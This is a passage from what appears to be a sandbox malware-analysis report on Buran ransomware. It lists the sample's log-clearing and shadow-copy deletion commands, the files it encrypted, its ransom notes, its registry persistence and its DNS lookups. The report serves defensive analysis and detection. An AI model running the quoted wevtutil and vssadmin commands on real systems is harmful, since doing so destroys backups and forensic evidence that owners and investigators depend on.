  610. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
  611.  
  612.  
  613. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
  614.  
  615.  
  616. "command": "vssadmin delete shadows /all /quiet"
  617.  
  618.  
  619. "command": "wevtutil.exe clear-log Application"
  620.  
  621.  
  622. "command": "wevtutil.exe clear-log Security"
  623.  
  624.  
  625. "command": "wevtutil.exe clear-log System"
  626.  
  627.  
  628.  
  629.  
  630.  
  631. * Started Service:
  632.  
  633. * Mutexes:
  634. "Global\\ADAP_WMI_ENTRY",
  635. "Global\\RefreshRA_Mutex",
  636. "Global\\RefreshRA_Mutex_Lib",
  637. "Global\\RefreshRA_Mutex_Flag"
  638.  
  639.  
  640. * Modified Files:
  641. "C:\\Users\\user\\AppData\\Local\\Temp\\3C20D05E.buran",
  642. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe",
  643. "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
  644. "\\??\\PIPE\\wkssvc",
  645. "\\Device\\LanmanDatagramReceiver",
  646. "\\??\\PIPE\\DAV RPC SERVICE",
  647. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  648. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  649. "\\??\\PIPE\\samr",
  650. "C:\\.doc",
  651. "C:\\.doc.3217EE46-3DA6-888C-CFD6-E175EC571166",
  652. "C:\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  653. "C:\\.htm",
  654. "C:\\.htm.3217EE46-3DA6-888C-CFD6-E175EC571166",
  655. "C:\\.jpeg",
  656. "C:\\.jpeg.3217EE46-3DA6-888C-CFD6-E175EC571166",
  657. "C:\\.jpg",
  658. "C:\\.jpg.3217EE46-3DA6-888C-CFD6-E175EC571166",
  659. "C:\\.pptx",
  660. "C:\\.pptx.3217EE46-3DA6-888C-CFD6-E175EC571166",
  661. "C:\\.txt",
  662. "C:\\.txt.3217EE46-3DA6-888C-CFD6-E175EC571166",
  663. "C:\\.xls",
  664. "C:\\.xls.3217EE46-3DA6-888C-CFD6-E175EC571166",
  665. "C:\\.zip",
  666. "C:\\2960.ini",
  667. "C:\\Host.bmp",
  668. "C:\\Host.bmp.3217EE46-3DA6-888C-CFD6-E175EC571166",
  669. "C:\\Host.docx",
  670. "C:\\Host.docx.3217EE46-3DA6-888C-CFD6-E175EC571166",
  671. "C:\\Host.html",
  672. "C:\\Host.html.3217EE46-3DA6-888C-CFD6-E175EC571166",
  673. "C:\\Host.jpeg",
  674. "C:\\Host.jpeg.3217EE46-3DA6-888C-CFD6-E175EC571166",
  675. "C:\\Host.jpg",
  676. "C:\\Host.jpg.3217EE46-3DA6-888C-CFD6-E175EC571166",
  677. "C:\\Host.pdf",
  678. "C:\\Host.pdf.3217EE46-3DA6-888C-CFD6-E175EC571166",
  679. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico",
  680. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico.3217EE46-3DA6-888C-CFD6-E175EC571166",
  681. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  682. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url",
  683. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url.3217EE46-3DA6-888C-CFD6-E175EC571166",
  684. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat",
  685. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat.3217EE46-3DA6-888C-CFD6-E175EC571166",
  686. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf",
  687. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf.3217EE46-3DA6-888C-CFD6-E175EC571166",
  688. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat",
  689. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat.3217EE46-3DA6-888C-CFD6-E175EC571166",
  690. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf",
  691. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf.3217EE46-3DA6-888C-CFD6-E175EC571166",
  692. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat",
  693. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat.3217EE46-3DA6-888C-CFD6-E175EC571166",
  694. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf",
  695. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf.3217EE46-3DA6-888C-CFD6-E175EC571166",
  696. "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT",
  697. "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT.3217EE46-3DA6-888C-CFD6-E175EC571166",
  698. "C:\\Program Files\\Java\\jre1.8.0_201\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  699. "C:\\Program Files\\Java\\jre1.8.0_201\\LICENSE"
  700.  
  701.  
  702. * Deleted Files:
  703. "C:\\Users\\user\\AppData\\Local\\Temp\\3C20D05E.buran",
  704. "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
  705. "C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe",
  706. "C:\\.doc",
  707. "C:\\.htm",
  708. "C:\\.jpeg",
  709. "C:\\.jpg",
  710. "C:\\.pptx",
  711. "C:\\.txt",
  712. "C:\\.xls",
  713. "C:\\Host.bmp",
  714. "C:\\Host.docx",
  715. "C:\\Host.html",
  716. "C:\\Host.jpeg",
  717. "C:\\Host.jpg",
  718. "C:\\Host.pdf",
  719. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico",
  720. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url",
  721. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat",
  722. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf",
  723. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat",
  724. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf",
  725. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat",
  726. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf",
  727. "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT"
  728.  
  729.  
  730. * Modified Registry Keys:
  731. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service",
  732. "HKEY_CURRENT_USER\\Software\\Buran V\\Service",
  733. "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Public Key",
  734. "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Machine ID",
  735. "HKEY_CURRENT_USER\\Software\\Buran V\\Knock",
  736. "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Paths",
  737. "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Paths\\0",
  738. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\Registry Writer",
  739. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\COM+ REGDB Writer",
  740. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\ASR Writer",
  741. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\Shadow Copy Optimization Writer",
  742. "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers",
  743. "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\\(Default)"
  744.  
  745.  
  746. * Deleted Registry Keys:
  747.  
  748. * DNS Communications:
  749.  
  750. "type": "A",
  751. "request": "geoiptool.com",
  752. "answers":
  753.  
  754.  
  755. "type": "A",
  756. "request": "iplogger.ru",
  757. "answers":
  758.  
  759.  
  760.  
  761. * Domains:
  762.  
  763. "ip": "158.69.67.193",
  764. "domain": "geoiptool.com"
  765.  
  766.  
  767. "ip": "88.99.66.31",
  768. "domain": "iplogger.ru"
  769.  
  770.  
  771.  
  772. * Network Communication - ICMP:
  773.  
  774. * Network Communication - HTTP:
  775.  
  776. * Network Communication - SMTP:
  777.  
  778. * Network Communication - Hosts:
  779.  
  780. * Network Communication - IRC: